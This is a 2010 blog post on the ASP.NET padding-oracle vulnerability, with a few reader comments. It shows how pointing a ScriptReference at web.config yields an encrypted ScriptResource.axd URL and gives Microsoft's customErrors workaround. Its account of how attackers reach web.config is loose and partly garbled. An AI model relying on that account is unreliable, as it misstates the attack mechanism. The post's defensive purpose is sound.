http://weblogs.asp.net/scottgu/archive/2010/09/30/asp-net-security-fix-now-on-windows-update.aspx — Updated on 01st-Oct-2010
http://weblogs.asp.net/scottgu/archive/2010/09/28/asp-net-security-update-now-available.aspx — Updated on 29th-Sep-2010
In this post I am going say something about ASP.NET Security Vulnerability.
This is very serious bug in ASP.NET security that allows the attacker to get sensitive information like database connection string and secure appsettings values from ASP.NET web site (web.config file). You can find more details about it here:
http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
and here are the FAQs:
What ASP.NET Framework provides is a handler WebResource.axd (or ScriptResource.axd, doesn’t really matter), that provides a way how to retrieve physical files of any kind from your web file system. You can see how this is supported if you add something like this on your page:
<asp:ScriptManager runat=”server” ID=”ScriptManager1″>
<CompositeScript>
<Scripts>
<asp:ScriptReference Path=”~/web.config” />
</Scripts>
</CompositeScript>
</asp:ScriptManager>
Here we set path to web.config, just playing with ASP.NET. Then run the file. we can see output of the page get renders something like below.
<script src=”/ScriptResource.axd?d=ycEQiwETfhMZkd5o_11LpmI4L71eSrGrjB4WUQB-z1FK8JRkVG-jdqKKNagaDb36HarishQCm1xQtV_PFSt2W4qR16tUC0vymsWFdtmjwxg1&t=633677089732500000″ type=”text/javascript”></script>
In this the “d” parameter hold the address of the resource, in encrypted. It good so far. But, somebody is able to encode the resource value. Once they get the right one or the encryption key, he can access anything and simply generate those keys. 🙁
How to prevent this:-
The official recommendation is to basically provide single error for any case. They suggest following settings:
<configuration>
<system.web>
<customErrors mode=”On” defaultRedirect=”~/error.html” />
</system.web>
</configuration>
or else
<location path=”WebResource.axd”>
<system.web>
<customErrors defaultRedirect=”~/error.html” mode=”On” />
</system.web>
</location>
<location path=”ScriptResource.axd”>
<system.web>
<customErrors defaultRedirect=”~/error.html” mode=”On” />
</system.web>
</location>
This to be enough to do.
Backup the site more often until the solution for this from Microsoft.
Get clear details about this from Here
http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
http://devnet.kentico.com/Blogs/Martin-Hejtmanek/September-2010/How-ASP-NET-Security-Vulnerability-affects-Kentico.aspx — this cool and clear!
Enjoy while coding..!
Thanks,
Naga Harish.
I really enjoy reading your blog. Great work and keep it up.
Thanks for your comment. Sure I will keep continue same!
Very impressed with this article, thanks for the solid information.
Thanks Cyprian, I too got the information from Scottgu (Official- he microsoft employee) blog. 🙂
I really like the work that has gone into making the post. I will be sure to tell my blog buddies about your content keep up the good work. Thanks